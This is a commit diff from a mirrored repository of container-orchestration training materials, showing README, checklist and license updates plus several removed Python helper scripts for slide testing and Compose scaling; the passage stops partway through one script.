mirror of https://github.com/jpetazzo/container.training.git (synced 2026-02-15 18:19:56 +00:00)
.gitignore (vendored, 22 lines)

@@ -1,8 +1,22 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
node_modules

### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride

### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db
CHECKLIST.md (new file, 24 lines)

@@ -0,0 +1,24 @@
Checklist to use when delivering a workshop
Authored by Jérôme; additions by Bridget

- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
- [ ] Push local branch to GitHub and merge into main repo
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] Update the slides that say which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
- [ ] (optional) Create chatroom
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy (see the sketch after this list)
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] How many VMs do we need? Check with event organizers ahead of time
- [ ] Provision VMs (slightly more than we think we'll need)
- [ ] Change password on presenter's VMs (to forestall any hijinx)
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
- [ ] Print cards
- [ ] Cut cards
- [ ] Last-minute merge from master
- [ ] Check that all looks good
- [ ] DELIVER!
- [ ] Shut down VMs
- [ ] Update index.html to remove chat link and move session to past things
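For the chatroom step, the chat link lives near the top of the deck's YML file. Here is a minimal sketch of what that setting might look like, based on the kube half-day example linked above; the key names and the room URL are assumptions, not the repository's actual values:

```yaml
# Hypothetical excerpt from slides/kube-halfday.yml (key names and URL are placeholders)
title: "Deploying and Scaling Microservices with Kubernetes"
chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
```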
LICENSE (19 lines)

@@ -1,13 +1,12 @@
Copyright 2015 Jérôme Petazzoni

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
The code in this repository is licensed under the Apache License
Version 2.0. You may obtain a copy of this license at:

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
The instructions and slides in this repository (e.g. the files
with extension .md and .yml in the "slides" subdirectory) are
under the Creative Commons Attribution 4.0 International Public
License. You may obtain a copy of this license at:

https://creativecommons.org/licenses/by/4.0/legalcode
README.md (382 lines)

@@ -1,8 +1,271 @@
# Orchestration at scale(s)
# Container Training

This is the material for the "Docker orchestration workshop"
written and delivered by Jérôme Petazzoni (and possibly others)
at multiple conferences and events like:
This repository (formerly known as `orchestration-workshop`)
contains materials (slides, scripts, demo app, and other
code samples) used for various workshops, tutorials, and
training sessions around the themes of Docker, containers,
and orchestration.

For the moment, it includes:

- Introduction to Docker and Containers,
- Container Orchestration with Docker Swarm,
- Container Orchestration with Kubernetes.

These materials have been designed around the following
principles:

- they assume very little prior knowledge of Docker,
  containers, or a particular programming language;
- they can be used in a classroom setup (with an
  instructor), or self-paced at home;
- they are hands-on, meaning that they contain lots
  of examples and exercises that you can easily
  reproduce;
- they progressively introduce concepts in chapters
  that build on top of each other.

If you're looking for the materials, you can stop reading
right now, and hop to http://container.training/, which
hosts all the available slide decks.

The rest of this document explains how this repository
is structured, and how to use it to deliver (or create)
your own tutorials.


## Why a single repository?

All these materials have been gathered in a single repository
because they have a few things in common:

- some [shared slides](slides/shared/) that are re-used
  (and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
  Markdown source files;
- a [semi-automated test harness](slides/autopilot/) to check
  that the exercises and examples provided work properly;
- a [PhantomJS script](slides/slidechecker.js) to check
  that the slides look good and don't have formatting issues;
- [deployment scripts](prepare-vms/) to start training
  VMs in bulk;
- a fancy pipeline powered by
  [Netlify](https://www.netlify.com/) and continuously
  deploying `master` to http://container.training/.


## What are the different courses available?

**Introduction to Docker** is derived from the first
"Docker Fundamentals" training materials. For more information,
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
The version in this repository has been adapted to the Markdown
publishing pipeline. It is still maintained, but only receives
minor updates once in a while.

**Container Orchestration with Docker Swarm** (formerly
known as "Orchestration Workshop") is a workshop created by Jérôme
Petazzoni in June 2015. Since then, it has been continuously updated
and improved, and has received contributions from many other authors.
It is actively maintained.

**Container Orchestration with Kubernetes** was created by
Jérôme Petazzoni in October 2017, with help and feedback from
a few other contributors. It is actively maintained.


## Repository structure

- [bin](bin/)
  - A few helper scripts that you can safely ignore for now.
- [dockercoins](dockercoins/)
  - The demo app used throughout the orchestration workshops.
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
  - Logging and metrics stacks used in the later parts of
    the orchestration workshops.
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
  - Contributed scripts to automate the creation of local environments.
    These could use some help to test/check that they work.
- [prepare-vms](prepare-vms/):
  - Scripts to automate the creation of AWS instances for students.
    These are routinely used and actively maintained.
- [slides](slides/):
  - All the slides! They are assembled from Markdown files with
    a custom Python script, and then rendered using [gnab/remark](
    https://github.com/gnab/remark). Check this directory for more details.
- [stacks](stacks/):
  - A handful of Compose files (version 3) that make it easy to
    deploy complex application stacks.


## Course structure

(This applies only to the orchestration workshops.)

The workshop introduces a demo app, "DockerCoins," built
around a micro-services architecture. First, we run it
on a single node, using Docker Compose. Then, we pretend
that we need to scale it, and we use an orchestrator
(SwarmKit or Kubernetes) to deploy and scale the app on
a cluster.

We explain the concepts of the orchestrator. For SwarmKit,
we set up the cluster with `docker swarm init` and `docker swarm join`.
For Kubernetes, we use pre-configured clusters.

Then, we cover more advanced concepts: scaling, load balancing,
updates, global services or daemon sets.

There are a number of advanced optional chapters about
logging, metrics, secrets, network encryption, etc.

The content is very modular: it is broken down into a large
number of Markdown files that are put together according
to a YAML manifest. This makes it very easy to re-use content
between different workshops.
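As a rough illustration of that mechanism, here is a minimal sketch of such a manifest; the file name, keys, and chapter paths are illustrative assumptions, not the exact schema consumed by the build script:

```yaml
# hypothetical-deck.yml: assembles Markdown chapters into one slide deck
title: "Container Orchestration Workshop"
chapters:
  - shared/title.md        # re-used identically across decks
  - intro/containers.md
  - swarm/creatingswarm.md
  - shared/thankyou.md
```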
### DockerCoins

The sample app is in the `dockercoins` directory.
It's used during all chapters
to explain different concepts of orchestration.

To see it in action:

- `cd dockercoins && docker-compose up -d`
- this will build and start all the services
- the web UI will be available on port 8000


## Running the Workshop

If you want to deliver one of these workshops yourself,
this section is for you!

> *This section has been mostly contributed by
> [Bret Fisher](https://twitter.com/bretfisher), who was
> one of the first people brave enough to deliver
> this workshop without me. Thanks Bret! 🍻
>
> Jérôme.*


### General timeline of planning a workshop

- Fork the repo and run through the slides, doing the hands-on parts to be sure
  you understand the different `dockercoins` repos and the steps we go through
  to get to a full Swarm Mode cluster of many containers. You'll update the
  first few slides and the last slide at a minimum, with your info.
- ~~Your docs directory can use GitHub Pages.~~
- This workshop expects 5 servers per student. You can get away with as few
  as 2 servers per student, but you'll need to change the slide deck to
  accommodate. More servers = more fun.
- If you have more than ~20 students, try to get an assistant (TA) to help
  people with issues, so you don't have to stop the workshop to help someone
  with ssh etc.
- AWS is our most tested process for generating student machines. In
  `prepare-vms` you'll find scripts to create EC2 instances, install docker,
  pre-pull images, and even print "cards" to place at each student's seat with
  IPs and username/password.
- Test AWS scripts: be sure to test creating *all* your needed servers a week
  before the workshop (just for a few minutes). You'll likely hit AWS limits in
  the region closest to your class, and it sometimes takes days to get AWS to
  raise those limits with a support ticket.
- Create a https://gitter.im chat room for your workshop and update the slides
  with the URL. It is also useful for the TA to monitor it during the workshop.
  You can use it before/after to answer questions, and it generally works as a
  better answer than "email me that question".
- If you can send an email to students ahead of time, mention how they should
  get SSH, and test that SSH works. If they can `ssh github.com` and get
  `permission denied (publickey)` then they know it worked, and SSH is properly
  installed and they don't have anything blocking it. SSH and a browser are all
  they need for class.
- Typically you create the servers the day before or the morning of the
  workshop, and leave them up the rest of the day afterwards. If creating
  hundreds of servers, you'll likely want to run all these `workshopctl`
  commands from a dedicated instance in the same region as the instances you
  want to create. It is much faster this way if you're on poor internet. Also,
  create 2 sets of servers for yourself: use one during the workshop and keep
  the 2nd as a backup.
- Remember you'll need to print the "cards" for students, so you'll need to
  create instances while you have a way to print them.


### Things That Could Go Wrong

- Creating AWS instances ahead of time, you hit limits in the region and
  didn't plan enough time to wait on support to increase them. :(
- Students have technical issues during the workshop: can't get ssh working,
  locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on the network! If the wifi is
  bad, you can try using MOSH (https://mosh.org), which handles SSH over UDP.
  TMUX (https://tmux.github.io) can also prevent you from losing your place if
  you get disconnected from the servers.
- Forgetting to print the "cards" and cut them up for handing out IPs.
- Forgetting to have fun and focus on your students!


### Creating the VMs

`prepare-vms/workshopctl` is the script that gets you most of what you need for
setting up instances. See
[prepare-vms/README.md](prepare-vms)
for all the info on tools and scripts.


### Content for Different Workshop Durations

With all the slides, this workshop is a full day long. If you need to deliver
it on a shorter timeline, here are some recommendations on what to cut out. You
can replace `---` with `???`, which will hide slides. Or leave them there and
add something like `(EXTRA CREDIT)` to the title, so students can still view
the content but you also know to skip them during the presentation. An example
of the `???` trick follows.
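Here is a sketch of that trick in a deck's Markdown source (the slide content is made up for illustration): `---` separates slides, and remark treats everything after `???` as speaker notes, so turning a separator into `???` folds the next slide into the previous one's notes:

```markdown
## A slide everyone sees

---

## Another visible slide

???

## An extra-credit slide
This one was hidden by replacing its `---` separator with `???`;
it now only shows up in the presenter's notes view.
```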
#### 3 Hour Version

- Limit time on the debug tools, maybe skip a few. *"Chapter 1:
  Identifying bottlenecks"*
- Limit time on Compose; try to have them building the Swarm Mode cluster by
  30 minutes in
- Skip most of Chapter 3, Centralized Logging and ELK
- Skip most of Chapter 4, but keep stateful services and DABs if possible
- Mention what DABs are, but make this part optional in case you run out
  of time


#### 2 Hour Version

- Skip all the above, and:
- Skip the story arc of debugging dockercoins altogether, skipping the
  troubleshooting tools. Just focus on getting them from single-host to
  multi-host and multi-container.
- The goal is: first 30 minutes on the intro, Docker Compose, and what
  dockercoins is, and getting it up on one node with docker-compose.
- The next 60-75 minutes is getting dockercoins into Swarm Mode services
  across servers. Big win.
- The last 15-30 minutes is for stateful services, DAB files, and questions.


### Pre-built images

There are pre-built images for the 4 components of the DockerCoins demo app:
`dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`,
and `dockercoins/worker:v0.1`. They correspond to the code in this repository.

There are also three variants, for demo purposes:

- `dockercoins/rng:v0.2` is broken (the server won't even start),
- `dockercoins/webui:v0.2` has a bigger font on the Y axis and a green graph (instead of blue),
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
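A minimal sketch of how these variants could be plugged in: a Compose file that uses the pre-built images directly, with two services pinned to `v0.2`. The `redis` service and the `8000:80` port mapping are assumptions based on the description above, not a file from this repository:

```yaml
# hypothetical Compose file running the pre-built images with two v0.2 variants
version: "2"
services:
  rng:
    image: dockercoins/rng:v0.1
  hasher:
    image: dockercoins/hasher:v0.1
  redis:
    image: redis                     # assumed backing store for the demo app
  worker:
    image: dockercoins/worker:v0.2   # the 11x-slower variant
  webui:
    image: dockercoins/webui:v0.2    # the green-graph variant
    ports:
      - "8000:80"                    # assumed mapping; the web UI is on port 8000
```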
## Past events

Since its inception, this workshop has been delivered dozens of times,
to thousands of people, and has continuously evolved. This is a short
history of the first times it was delivered. Look also in the "tags"
of this repository: they all correspond to successive iterations of
this workshop. If you attended a past version of the workshop, you
can use these tags to see what has changed since then.

- QCON, New York City (2015, June)
- KCDC, Kansas City (2015, June)

@@ -13,80 +276,7 @@ at multiple conferences and events like:
- SCALE, Pasadena (2016, January)
- Zenika, Paris (2016, February)
- Container Solutions, Amsterdam (2016, February)


## Slides

The slides are in the `www/htdocs` directory.

The recommended way to view them is to:

- have a Docker host
- clone this repository to your Docker host
- `cd www && docker-compose up -d`
- this will start a web server on port 80
- point your browser at your Docker host and enjoy


## Sample code

The sample app is in the `dockercoins` directory.

To see it in action:

- `cd dockercoins && docker-compose up -d`
- this will build and start all the services
- the web UI will be available on port 8000


## Running the workshop

WARNING: those instructions are incomplete. Consider
them as notes quickly drafted on a napkin rather than
proper documentation!


### Creating the VMs

I use the `trainctl` script from the `docker-fundamentals`
repository. Sorry if you don't have that!

After starting the VMs, use the `trainctl ips` command
to dump the list of IP addresses into a file named `ips.txt`.


### Generating the printed cards

- Put the `ips.txt` file in the `prepare-vms` directory.
- Generate the HTML file.
- Open it in Chrome.
- Transform it to PDF.
- Print it.


### Deploying your SSH key to all the machines

- Make sure that you have SSH keys loaded (`ssh-add -l`).
- Source `rc`.
- Run `pcopykey`.


### Installing extra packages

- Source `postprep.rc`.
  (This will install a few extra packages, add entries to
  /etc/hosts, generate SSH keys, and deploy them on all hosts.)


### Final touches

- Set up two groups of machines for the instructor's use.
- You will use the first group during the workshop.
- The second group will run a web server with the slides.
- Log into the first machine of the second group.
- Git clone this repo.
- Put up the web server as instructed above.
- Use cli53 to add an A record for e.g. `view.dckr.info`.
- ... and much more!


# Problems? Bugs? Questions?

@@ -99,12 +289,34 @@ If there is a bug and you can't fix it, but you can
reproduce it: submit an issue explaining how to reproduce.

If there is a bug and you can't even reproduce it:
sorry. It is probably a Heisenbug. I can't act on it
until it's reproducible.
sorry. It is probably a Heisenbug. We can't act on it
until it's reproducible, alas.

If you have attended this workshop and have feedback,
or if you want us to deliver that workshop at your
conference or for your company: contact me (jerome
at docker dot com).

Thank you!
# “Please teach us!”

If you have attended one of these workshops, and want
your team or organization to attend a similar one, you
can look at the list of upcoming events on
http://container.training/.

You are also welcome to reuse these materials to run
your own workshop, for your team or even at a meetup
or conference. In that case, you might enjoy watching
[Bridget Kromhout's talk at KubeCon 2018 Europe](
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
precisely how to run such a workshop yourself.

Finally, you can also contact the following persons,
who are experienced speakers, are familiar with the
material, and are available to deliver these workshops
at your conference or for your company:

- jerome dot petazzoni at gmail dot com
- bret at bretfisher dot com

(If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!)

**Thank you!**
@@ -1,191 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import re
|
||||
import signal
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
def print_snippet(snippet):
|
||||
print(78*'-')
|
||||
print(snippet)
|
||||
print(78*'-')
|
||||
|
||||
class Snippet(object):
|
||||
|
||||
def __init__(self, slide, content):
|
||||
self.slide = slide
|
||||
self.content = content
|
||||
self.actions = []
|
||||
|
||||
def __str__(self):
|
||||
return self.content
|
||||
|
||||
|
||||
class Slide(object):
|
||||
|
||||
current_slide = 0
|
||||
|
||||
def __init__(self, content):
|
||||
Slide.current_slide += 1
|
||||
self.number = Slide.current_slide
|
||||
# Remove commented-out slides
|
||||
# (remark.js considers ??? to be the separator for speaker notes)
|
||||
content = re.split("\n\?\?\?\n", content)[0]
|
||||
self.content = content
|
||||
self.snippets = []
|
||||
exercises = re.findall("\.exercise\[(.*)\]", content, re.DOTALL)
|
||||
for exercise in exercises:
|
||||
if "```" in exercise and "<br/>`" in exercise:
|
||||
print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
print_snippet(exercise)
|
||||
elif "```" in exercise:
|
||||
for snippet in exercise.split("```")[1::2]:
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
elif "<br/>`" in exercise:
|
||||
for snippet in re.findall("<br/>`(.*)`", exercise):
|
||||
self.snippets.append(Snippet(self, snippet))
|
||||
else:
|
||||
print(" Exercise on slide {} has neither ``` or <br/>` delimiters, skipping."
|
||||
.format(self.number))
|
||||
|
||||
def __str__(self):
|
||||
text = self.content
|
||||
for snippet in self.snippets:
|
||||
text = text.replace(snippet.content, ansi("7")(snippet.content))
|
||||
return text
|
||||
|
||||
|
||||
def ansi(code):
|
||||
return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)
|
||||
|
||||
slides = []
|
||||
with open("index.html") as f:
|
||||
content = f.read()
|
||||
for slide in re.split("\n---?\n", content):
|
||||
slides.append(Slide(slide))
|
||||
|
||||
is_editing_file = False
|
||||
placeholders = {}
for slide in slides:
    for snippet in slide.snippets:
        content = snippet.content
        # Multi-line snippets should be ```highlightsyntax...
        # Single-line snippets will be interpreted as shell commands
        if '\n' in content:
            highlight, content = content.split('\n', 1)
        else:
            highlight = "bash"
        content = content.strip()
        # If the previous snippet was a file fragment, and the current
        # snippet is not YAML or EDIT, complain.
        if is_editing_file and highlight not in ["yaml", "edit"]:
            print("! On slide {}, previous snippet was YAML; what should we do?"
                  .format(slide.number))
            print_snippet(content)
        is_editing_file = False
        if highlight == "yaml":
            is_editing_file = True
        elif highlight == "placeholder":
            for line in content.split('\n'):
                variable, value = line.split(' ', 1)
                placeholders[variable] = value
        elif highlight == "bash":
            # Iterate over a copy, since we delete entries as we go.
            for variable, value in list(placeholders.items()):
                quoted = "`{}`".format(variable)
                if quoted in content:
                    content = content.replace(quoted, value)
                    del placeholders[variable]
            if '`' in content:
                print("! The following snippet on slide {} contains a backtick:"
                      .format(slide.number))
                print_snippet(content)
                continue
            print("_ "+content)
            snippet.actions.append((highlight, content))
        elif highlight == "edit":
            print(". "+content)
            snippet.actions.append((highlight, content))
        elif highlight == "meta":
            print("^ "+content)
            snippet.actions.append((highlight, content))
        else:
            print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))

if placeholders:
    print("! Remaining placeholder values: {}".format(placeholders))

actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])

# Strip ^{ ... ^} for now
def strip_curly_braces(actions, in_braces=False):
    if actions == []:
        return []
    elif actions[0] == ("meta", "^{"):
        return strip_curly_braces(actions[1:], True)
    elif actions[0] == ("meta", "^}"):
        return strip_curly_braces(actions[1:], False)
    elif in_braces:
        return strip_curly_braces(actions[1:], True)
    else:
        return [actions[0]] + strip_curly_braces(actions[1:], False)

actions = strip_curly_braces(actions)

background = []
cwd = os.path.expanduser("~")
env = {}
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
    if current_action[0] == "meta":
        continue
    print(ansi(7)(">>> {}".format(current_action[1])))
    time.sleep(1)
    popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
    # The following hack allows us to capture the environment variables set by `docker-machine env`.
    # FIXME: this doesn't handle `unset` for now
    if any([
        "eval $(docker-machine env" in current_action[1],
        "DOCKER_HOST" in current_action[1],
        "COMPOSE_FILE" in current_action[1],
    ]):
        popen_options["stdout"] = subprocess.PIPE
        # Actions are tuples (and therefore immutable), so rebuild this one.
        current_action = (current_action[0], current_action[1] + "\nenv")
    proc = subprocess.Popen(current_action[1], **popen_options)
    proc.cmd = current_action[1]
    if next_action[0] == "meta":
        print(">>> {}".format(next_action[1]))
        time.sleep(3)
        if next_action[1] == "^C":
            os.killpg(proc.pid, signal.SIGINT)
            proc.wait()
        elif next_action[1] == "^Z":
            # Let the process run
            background.append(proc)
        elif next_action[1] == "^D":
            proc.communicate()
            proc.wait()
        else:
            print("! Unknown meta action {} after snippet:".format(next_action[1]))
            print_snippet(next_action[1])
        print(ansi(7)("<<< {}".format(current_action[1])))
    else:
        proc.wait()
        if "stdout" in popen_options:
            stdout, stderr = proc.communicate()
            for line in stdout.split('\n'):
                if line.startswith("DOCKER_"):
                    variable, value = line.split('=', 1)
                    env[variable] = value
                    print("=== {}={}".format(variable, value))
        print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
        if proc.returncode != 0:
            print("Got non-zero status code; aborting.")
            break
    if current_action[1].startswith("cd "):
        cwd = os.path.expanduser(current_action[1][3:])

for proc in background:
    print("Terminating background process:")
    print_snippet(proc.cmd)
    proc.terminate()
    proc.wait()
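To see what the `placeholder` machinery above actually does, here is a minimal, self-contained sketch (the variable name and value are made up; only the backtick-substitution logic mirrors the script):

```python
# Minimal sketch of the backtick/placeholder substitution performed above.
# "NODE1" and its value are hypothetical; real values come from
# placeholder snippets in the slides.
placeholders = {"NODE1": "node1.example.com"}

content = "ssh `NODE1` docker ps"
for variable, value in list(placeholders.items()):
    quoted = "`{}`".format(variable)
    if quoted in content:
        content = content.replace(quoted, value)
        del placeholders[variable]  # each placeholder is consumed once

print(content)  # -> ssh node1.example.com docker ps
```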
@@ -1 +0,0 @@
../www/htdocs/index.html
@@ -1,42 +0,0 @@
#!/usr/bin/env python

import os
import sys
import yaml

# arg 1 = service name
# arg 2 = number of instances

service_name = sys.argv[1]
desired_instances = int(sys.argv[2])

compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file

config = yaml.load(open(input_file))

# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))

port = str(ports[service_name])

command_line = port

depends_on = []

for n in range(1, 1+desired_instances):
    config["services"]["{}{}".format(service_name, n)] = config["services"][service_name]
    command_line += " {}{}:{}".format(service_name, n, port)
    depends_on.append("{}{}".format(service_name, n))

config["services"][service_name] = {
    "image": "jpetazzo/hamba",
    "command": command_line,
    "depends_on": depends_on,
}
if "networks" in config["services"]["{}1".format(service_name)]:
    config["services"][service_name]["networks"] = config["services"]["{}1".format(service_name)]["networks"]

yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)
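For reference, here is a quick sketch of the transformation performed by the script above, on a made-up Compose dictionary (service name, port, and image are illustrative):

```python
# Hypothetical before/after for the scaling script above.
config = {"services": {"rng": {"image": "dockercoins_rng"}}}
service_name, desired_instances, port = "rng", 2, "8001"

command_line = port
depends_on = []
for n in range(1, 1 + desired_instances):
    config["services"]["{}{}".format(service_name, n)] = config["services"][service_name]
    command_line += " {}{}:{}".format(service_name, n, port)
    depends_on.append("{}{}".format(service_name, n))

# The original service becomes a hamba ambassador in front of rng1 and rng2.
config["services"][service_name] = {
    "image": "jpetazzo/hamba",
    "command": command_line,   # "8001 rng1:8001 rng2:8001"
    "depends_on": depends_on,  # ["rng1", "rng2"]
}
```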
@@ -1,87 +0,0 @@
#!/usr/bin/env python

import os
import sys
import yaml

def error(msg):
    print("ERROR: {}".format(msg))
    exit(1)

# arg 1 = service name

service_name = sys.argv[1]

compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file

config = yaml.load(open(input_file))

version = config.get("version")
if version != "2":
    error("Unsupported $COMPOSE_FILE version: {!r}".format(version))

# The load balancers need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))

port = str(ports[service_name])

if service_name not in config["services"]:
    error("service {} not found in $COMPOSE_FILE"
          .format(service_name))

lb_name = "{}-lb".format(service_name)
be_name = "{}-be".format(service_name)
wd_name = "{}-wd".format(service_name)

if lb_name in config["services"]:
    error("load balancer {} already exists in $COMPOSE_FILE"
          .format(lb_name))

if wd_name in config["services"]:
    error("dns watcher {} already exists in $COMPOSE_FILE"
          .format(wd_name))

service = config["services"][service_name]
if "networks" in service:
    error("service {} has custom networks"
          .format(service_name))

# Put the service on its own network.
service["networks"] = {service_name: {"aliases": [ be_name ] } }
# Put a label indicating which load balancer is responsible for this service.
if "labels" not in service:
    service["labels"] = {}
service["labels"]["loadbalancer"] = lb_name

# Add the load balancer.
config["services"][lb_name] = {
    "image": "jpetazzo/hamba",
    "command": "{} {} {}".format(port, be_name, port),
    "depends_on": [ service_name ],
    "networks": {
        "default": {
            "aliases": [ service_name ],
        },
        service_name: None,
    },
}

# Add the DNS watcher.
config["services"][wd_name] = {
    "image": "jpetazzo/watchdns",
    "command": "{} {} {}".format(port, be_name, port),
    "volumes_from": [ lb_name ],
    "networks": {
        service_name: None,
    },
}

if "networks" not in config:
    config["networks"] = {}
if service_name not in config["networks"]:
    config["networks"][service_name] = None

yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)
@@ -1,63 +0,0 @@
#!/usr/bin/env python

from common import ComposeFile
import os
import subprocess
import time

registry = os.environ.get("DOCKER_REGISTRY")

if not registry:
    print("Please set the DOCKER_REGISTRY variable, e.g.:")
    print("export DOCKER_REGISTRY=jpetazzo # use the Docker Hub")
    print("export DOCKER_REGISTRY=localhost:5000 # use a local registry")
    exit(1)

# Get the name of the current directory.
project_name = os.path.basename(os.path.realpath("."))

# Version used to tag the generated Docker image, using the UNIX timestamp or the given version.
if "VERSION" not in os.environ:
    version = str(int(time.time()))
else:
    version = os.environ["VERSION"]

# Execute "docker-compose build" and abort if it fails.
subprocess.check_call(["docker-compose", "-f", "docker-compose.yml", "build"])

# Load the services from the input docker-compose.yml file.
# TODO: run parallel builds.
compose_file = ComposeFile("docker-compose.yml")

# Iterate over all services that have a "build" definition.
# Tag them, and initiate a push in the background.
push_operations = dict()
for service_name, service in compose_file.services.items():
    if "build" in service:
        compose_image = "{}_{}".format(project_name, service_name)
        registry_image = "{}/{}:{}".format(registry, compose_image, version)
        # Re-tag the image so that it can be uploaded to the registry.
        subprocess.check_call(["docker", "tag", compose_image, registry_image])
        # Spawn "docker push" to upload the image.
        push_operations[service_name] = subprocess.Popen(["docker", "push", registry_image])
        # Replace the "build" definition by an "image" definition,
        # using the name of the image on the registry.
        del service["build"]
        service["image"] = registry_image

# Wait for push operations to complete.
for service_name, popen_object in push_operations.items():
    print("Waiting for {} push to complete...".format(service_name))
    popen_object.wait()
    print("Done.")

# Write the new docker-compose.yml file.
if "COMPOSE_FILE" not in os.environ:
    os.environ["COMPOSE_FILE"] = "docker-compose.yml-{}".format(version)
    print("Writing to new Compose file:")
else:
    print("Writing to provided Compose file:")

print("COMPOSE_FILE={}".format(os.environ["COMPOSE_FILE"]))
compose_file.save()
@@ -1,76 +0,0 @@
import os
import subprocess
import sys
import time
import yaml


def COMPOSE_FILE():
    if "COMPOSE_FILE" not in os.environ:
        print("The $COMPOSE_FILE environment variable is not set. Aborting.")
        exit(1)
    return os.environ["COMPOSE_FILE"]


class ComposeFile(object):

    def __init__(self, filename=None):
        if filename is None:
            filename = COMPOSE_FILE()
        if not os.path.isfile(filename):
            print("File {!r} does not exist. Aborting.".format(filename))
            exit(1)
        self.data = yaml.load(open(filename))

    @property
    def services(self):
        if self.data.get("version") == "2":
            return self.data["services"]
        else:
            return self.data

    def save(self, filename=None):
        if filename is None:
            filename = COMPOSE_FILE()
        with open(filename, "w") as f:
            yaml.safe_dump(self.data, f, default_flow_style=False)


# Executes a bunch of commands in parallel, but no more than N at a time.
# This allows executing a large number of tasks concurrently, without
# turning into a fork bomb.
# `parallelism` is the number of tasks to execute simultaneously.
# `commands` is a list of tasks to execute.
# Each task is itself a list, where the first element is a descriptive
# string, and the following elements are the arguments to pass to Popen.
def parallel_run(commands, parallelism):
    running = []
    # While stuff is running, or we have stuff to run...
    while commands or running:
        # While there is stuff to run, and room in the pipe...
        while commands and len(running)<parallelism:
            command = commands.pop(0)
            print("START {}".format(command[0]))
            popen = subprocess.Popen(
                command[1:], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            popen._desc = command[0]
            running.append(popen)
        must_sleep = True
        # Iterate over a copy, since we remove finished tasks as we go.
        for popen in running[:]:
            status = popen.poll()
            if status is not None:
                must_sleep = False
                running.remove(popen)
                if status==0:
                    print("OK {}".format(popen._desc))
                else:
                    print("ERROR {} [Exit status: {}]"
                          .format(popen._desc, status))
                    output = "\n" + popen.communicate()[0].strip()
                    output = output.replace("\n", "\n| ")
                    print(output)
            else:
                print("WAIT ({} running, {} more to run)"
                      .format(len(running), len(commands)))
        if must_sleep:
            time.sleep(1)
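A hedged usage sketch for this module (service names and commands are illustrative; each task passed to `parallel_run` is a description followed by the argument vector handed to `subprocess.Popen`, as described in the comments above):

```python
# Hypothetical usage of the helpers defined in common.py.
from common import ComposeFile, parallel_run

compose_file = ComposeFile("docker-compose.yml")  # assumes this file exists
print(sorted(compose_file.services))              # list the service names

commands = [
    ["say hello", "echo", "hello"],   # [description, arg0, arg1, ...]
    ["sleep a bit", "sleep", "1"],
]
parallel_run(commands, 2)  # run at most 2 tasks at a time
```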
@@ -1,69 +0,0 @@
#!/usr/bin/env python

from common import parallel_run
import os
import subprocess

project_name = os.path.basename(os.path.realpath("."))

# Get all services and backends in our compose application.
containers_data = subprocess.check_output([
    "docker", "ps",
    "--filter", "label=com.docker.compose.project={}".format(project_name),
    "--format", '{{ .ID }} '
                '{{ .Label "com.docker.compose.service" }} '
                '{{ .Ports }}',
])

# Build list of backends.
frontend_ports = dict()
backends = dict()
for container in containers_data.split('\n'):
    if not container:
        continue
    # TODO: support services with multiple ports!
    container_id, service_name, port = container.split(' ')
    if not port:
        continue
    backend, frontend = port.split("->")
    backend_addr, backend_port = backend.split(':')
    frontend_port, frontend_proto = frontend.split('/')
    # TODO: deal with udp (mostly skip it?)
    assert frontend_proto == "tcp"
